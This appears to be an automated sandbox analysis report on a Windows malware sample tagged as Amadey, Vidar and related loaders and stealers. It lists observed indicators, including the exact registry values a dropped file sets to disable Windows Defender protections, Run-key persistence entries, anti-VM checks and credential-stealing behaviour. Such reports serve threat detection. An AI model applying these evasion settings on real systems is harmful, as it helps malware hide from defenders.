Malware Analysis Report

2025-04-03 09:35

Sample ID 250224-qnckkavks4
Target 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2
SHA256 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2
Tags
amadey gcleaner healer systembc vidar 9c9aa5 a4d2cd credential_access defense_evasion discovery dropper evasion execution loader persistence spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2

Threat Level: Known bad

The file 97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2 was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner healer systembc vidar 9c9aa5 a4d2cd credential_access defense_evasion discovery dropper evasion execution loader persistence spyware stealer trojan

Healer family

Amadey

Healer

Detects Healer an antivirus disabler dropper

Gcleaner family

Modifies Windows Defender notification settings

Amadey family

Modifies Windows Defender Real-time Protection settings

Systembc family

Vidar family

SystemBC

GCleaner

Modifies Windows Defender DisableAntiSpyware settings

Modifies Windows Defender TamperProtection settings

Detect Vidar Stealer

Vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Uses browser remote debugging

Downloads MZ/PE file

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Checks computer location settings

Unsecured Credentials: Credentials In Files

Executes dropped EXE

Identifies Wine through registry keys

Checks BIOS information in registry

Reads data files stored by FTP clients

Windows security modification

Reads user/profile data of web browsers

Reads user/profile data of local email clients

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Looks up external IP address via web service

Suspicious use of SetThreadContext

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Browser Information Discovery

Program crash

System Location Discovery: System Language Discovery

Unsigned PE

Enumerates physical storage devices

Kills process with taskkill

Checks processor information in registry

Modifies data under HKEY_USERS

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Scheduled Task/Job: Scheduled Task

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Modifies system certificate store

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Delays execution with timeout.exe

Enumerates system info in registry

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-02-24 13:24

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-24 13:24

Reported

2025-02-24 13:26

Platform

win7-20240903-en

Max time kernel

149s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Healer

dropper healer

Healer family

healer

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A

Modifies Windows Defender TamperProtection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A

Modifies Windows Defender notification settings

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A

SystemBC

trojan systembc

Systembc family

systembc

Vidar

stealer vidar

Vidar family

vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM)

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\ProgramData\omlnpw\uxek.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\ProgramData\omlnpw\uxek.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\ProgramData\omlnpw\uxek.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
N/A N/A C:\ProgramData\omlnpw\uxek.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A

Identifies Wine through registry keys

defense_evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\ProgramData\omlnpw\uxek.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Windows security modification

defense_evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\TempBEQIZJZKE0WCOYBJEZBQRUIJQK6TPDGU.EXE N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\f87af9d1cb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\f87af9d1cb.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\Test Task17.job C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe N/A
File created C:\Windows\Tasks\skotes.job C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\omlnpw\uxek.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1091693101\f87af9d1cb.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
